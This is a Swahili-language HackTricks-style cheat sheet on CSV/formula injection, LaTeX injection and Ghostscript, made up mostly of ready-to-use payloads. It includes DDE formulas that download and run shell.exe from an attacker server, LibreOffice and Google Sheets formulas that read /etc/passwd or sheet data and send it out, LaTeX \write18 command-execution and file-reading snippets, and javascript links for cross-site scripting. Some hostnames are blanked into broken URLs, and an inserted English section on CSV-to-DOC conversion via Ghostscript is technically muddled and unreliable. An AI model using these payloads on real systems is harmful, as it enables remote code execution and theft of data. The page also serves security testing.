# Uingiliaji wa Formula/CSV/Doc/LaTeX/GhostScript
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
**Kikundi cha Usalama cha Try Hard**
{% embed url="https://discord.gg/tryhardsecurity" %} *** ## Uingiliaji wa Formula ### Taarifa Ikiwa **kuingiza kwako** kunakuwa **kimeakisiwa** ndani ya **faili za CSV** (au faili yoyote ambayo labda itafunguliwa na **Excel**), labda unaweza kuweka **mambo ya Excel** ambayo yatakuwa **yakitekelezwa** wakati mtumiaji **anafungua faili** au wakati mtumiaji **anabonyeza kiungo** fulani ndani ya karatasi ya Excel. {% hint style="danger" %} Leo hii **Excel itatoa tahadhari** (mara kadhaa) kwa **mtumiaji wakati kitu kinapakuliwa kutoka nje ya Excel** ili kumzuia kufanya kitendo cha uovu. Kwa hivyo, juhudi maalum za Uhandisi wa Kijamii lazima zitumike kwa mzigo wa mwisho. {% endhint %} ### [Orodha ya Maneno](https://github.com/payloadbox/csv-injection-payloads) ``` DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+9)*cmd|' /C calc'!A0 =10+20+cmd|' /C calc'!A0 =cmd|' /C notepad'!'A1' =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 ``` ### Kiungo **Mfano ufuatao ni muhimu sana kwa kuchukua maudhui kutoka kwenye karatasi ya mwisho ya Excel na kufanya maombi kwa maeneo ya kupendelea. Lakini inahitaji mtumiaji bonyeza kiungo (na kukubali onyo).** Mfano ufuatao ulichukuliwa kutoka [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit) Fikiria uvunjaji wa usalama katika mfumo wa Usimamizi wa Rekodi za Wanafunzi unaochexploitishwa kupitia shambulio la CSV injection. Nia kuu ya muhusika ni kuhatarisha mfumo unaotumiwa na walimu kusimamia maelezo ya wanafunzi. Mbinu inajumuisha muhusika kuingiza mzigo mbaya kwenye programu, hasa kwa kuingiza fomula zenye madhara kwenye maeneo yanayolenga maelezo ya wanafunzi. Shambulio linatokea kama ifuatavyo: 1. **Kuingiza Mzigo Mbaya:** * Muhusika anawasilisha fomu ya maelezo ya mwanafunzi lakini anajumuisha fomula inayotumiwa kawaida kwenye karatasi za kielektroniki (k.m., `=HYPERLINK("","Bonyeza hapa")`). * Fomula hii imeundwa kujenga kiungo, lakini inaelekeza kwenye seva mbaya inayodhibitiwa na muhusika. 2. **Kuuza Data Iliyohatarishwa:** * Walimu, bila kujua kuhusu tishio, hutumia utendaji wa programu kuuza data kwenye faili ya CSV. * Faili ya CSV, inapofunguliwa, bado ina mzigo mbaya. Mzigo huu unaonekana kama kiungo kinachoweza kubonyezwa kwenye karatasi ya kielektroniki. 3. **Kuzindua Shambulio:** * Mwalimu anabonyeza kiungo, akiamini kuwa sehemu halali ya maelezo ya mwanafunzi. * Baada ya kubonyeza, data nyeti (ikiwa ni pamoja na maelezo kutoka kwenye karatasi ya kielektroniki au kompyuta ya mwalimu) inatumwa kwenye seva ya muhusika. 4. **Kuingiza Data:** * Seva ya muhusika inapokea na kuingiza data nyeti iliyotumwa kutoka kwenye kompyuta ya mwalimu. * Muhusika anaweza kutumia data hii kwa madhumuni mbaya mbalimbali, hivyo kuhatarisha zaidi faragha na usalama wa wanafunzi na taasisi. ### RCE **Angalia** [**chapisho la awali**](https://notsosecure.com/data-exfiltration-formula-injection-part1) **kwa maelezo zaidi.** Katika miundombinu maalum au toleo za zamani za Excel, kipengele kinachoitwa Dynamic Data Exchange (DDE) kinaweza kuchexploitishwa kwa kutekeleza amri za kupendelea. Ili kutumia hili, mipangilio ifuatayo lazima iwezeshwe: * Nenda kwa Faili → Chaguo → Kituo cha Kuaminika → Mipangilio ya Kituo cha Kuaminika → Yaliyomo ya Nje, na wezesha **Uzinduzi wa Seva ya Kubadilishana Data ya Kudumu**. Wakati karatasi ya kielektroniki yenye mzigo mbaya inapofunguliwa (na ikiwa mtumiaji anakubali onyo), mzigo huo hutekelezwa. Kwa mfano, kuzindua programu ya kuhesabu, mzigo ungekuwa: ```markdown =cmd|' /C calc'!xxx ``` Unaweza pia kutekeleza amri zaidi, kama vile kupakua na kutekeleza faili kutumia PowerShell: ```bash =cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1 ``` ### Uingizaji wa Faili ya Ndani (LFI) katika LibreOffice Calc LibreOffice Calc inaweza kutumika kusoma faili za ndani na kuvuja data. Hapa kuna njia kadhaa: * Kusoma mstari wa kwanza kutoka kwa faili ya ndani `/etc/passwd`: `='file:///etc/passwd'#$passwd.A1` * Kuvuja data iliyosomwa kwa seva iliyoongozwa na mshambuliaji: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))` * Kuvuja zaidi ya mstari mmoja: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))` * Kuvuja DNS (kutuma data iliyosomwa kama maswali ya DNS kwa seva ya DNS iliyoongozwa na mshambuliaji): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))` ### Google Sheets kwa Kuvuja Data Nje ya Band (OOB) Google Sheets inatoa kazi ambazo zinaweza kutumiwa kwa kuvuja data nje ya band: * **CONCATENATE**: Inaongeza vivuli pamoja - `=CONCATENATE(A2:E2)` * **IMPORTXML**: Inaingiza data kutoka kwa aina za data zilizopangwa - `=IMPORTXML(CONCAT("http:///123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")` * **IMPORTFEED**: Inaingiza vyanzo vya RSS au ATOM - `=IMPORTFEED(CONCAT("http:////123.txt?v=", CONCATENATE(A2:E2)))` * **IMPORTHTML**: Inaingiza data kutoka kwa meza au orodha za HTML - `=IMPORTHTML (CONCAT("http:///123.txt?v=", CONCATENATE(A2:E2)),"meza",1)` * **IMPORTRANGE**: Inaingiza safu ya seli kutoka kwa karatasi nyingine ya hesabu - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Kitambulisho cha Karatasi]", "karatasi1!A2:E2")` * **IMAGE**: Inaweka picha kwenye seli - `=IMAGE("https:///images/srpr/logo3w.png")` ## Uingizaji wa LaTeX Kawaida seva ambazo utaona kwenye mtandao zinatumia **`pdflatex`** kubadilisha msimbo wa LaTeX kuwa PDF.\ Programu hii hutumia sifa 3 kuu kwa ajili ya kutekeleza amri: * **`--no-shell-escape`**: **Zima** ujenzi wa `\write18{amri}`, hata kama imezimwa katika faili ya texmf.cnf. * **`--shell-restricted`**: Sawa na `--shell-escape`, lakini **imepunguzwa** kwa seti 'salama' ya **amri zilizopangwa** (\*\*Kwenye Ubuntu 16.04 orodha iko katika `/usr/share/texmf/web2c/texmf.cnf`). * **`--shell-escape`**: **Washa** ujenzi wa `\write18{amri}`. Amri inaweza kuwa amri yoyote ya kabati. Ujenzi huu kawaida haikubaliki kwa sababu za usalama. Hata hivyo, kuna njia nyingine za kutekeleza amri, hivyo ili kuepuka RCE ni muhimu sana kutumia `--shell-restricted`. ### Soma faili Inaweza kuhitaji kurekebisha uingizaji na vifungashio kama \[ au $. ```bash \input{/etc/passwd} \include{password} # load .tex file \lstinputlisting{/usr/share/texmf/web2c/texmf.cnf} \usepackage{verbatim} \verbatiminput{/etc/passwd} ``` #### Soma faili lenye mstari mmoja ```bash \newread\file \openin\file=/etc/issue \read\file to\line \text{\line} \closein\file ``` #### Soma faili lenye mistari mingi ```bash \newread\file \openin\file=/etc/passwd \loop\unless\ifeof\file \read\file to\fileline \text{\fileline} \repeat \closein\file ``` ### Andika faili ```bash \newwrite\outfile \openout\outfile=cmd.tex \write\outfile{Hello-world} \closeout\outfile ``` ### Kutumia amri Kuingia kwa amri itaelekezwa kwa stdin, tumia faili la muda kupata hiyo. ```bash \immediate\write18{env > output} \input{output} \input{|"/bin/hostname"} \input{|"extractbb /etc/passwd > /tmp/b.tex"} # allowed mpost command RCE \documentclass{article}\begin{document} \immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"} \end{document} # If mpost is not allowed there are other commands you might be able to execute ## Just get the version \input{|"bibtex8 --version > /tmp/b.tex"} ## Search the file pdfetex.ini \input{|"kpsewhich pdfetex.ini > /tmp/b.tex"} ## Get env var value \input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"} ## Get the value of shell_escape_commands without needing to read pdfetex.ini \input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"} ``` ### LaTex Injection in CSV to DOC Conversion #### Description: When converting a CSV file to a DOC file using Ghostscript in a LaTex document, an attacker can inject malicious commands into the resulting DOC file. #### Impact: This vulnerability can be exploited to execute arbitrary commands on the system when the DOC file is opened. #### Steps to Reproduce: 1. Create a CSV file with malicious LaTex commands. 2. Convert the CSV file to a DOC file using Ghostscript in a LaTex document. 3. Open the resulting DOC file and observe the execution of the injected commands. #### Prevention: - Avoid converting untrusted CSV files to DOC using Ghostscript. - Sanitize user inputs to prevent malicious injections. ```bash \immediate\write18{env | base64 > test.tex} \input{text.tex} ``` ```bash \input|ls|base4 \input{|"/bin/hostname"} ``` ### Udukuzi wa Kuvuka Tovuti Kutoka [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) ```bash \url{javascript:alert(1)} \href{javascript:alert(1)}{placeholder} ``` ## Uingizaji wa Ghostscript **Angalia** [**https://blog.redteam-pentesting.de/2023/ghostscript-overview/**](https://blog.redteam-pentesting.de/2023/ghostscript-overview/) ## Marejeo * [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1) * [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/) * [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection) * [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) **Kikundi cha Usalama cha Try Hard**
{% embed url="https://discord.gg/tryhardsecurity" %}
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.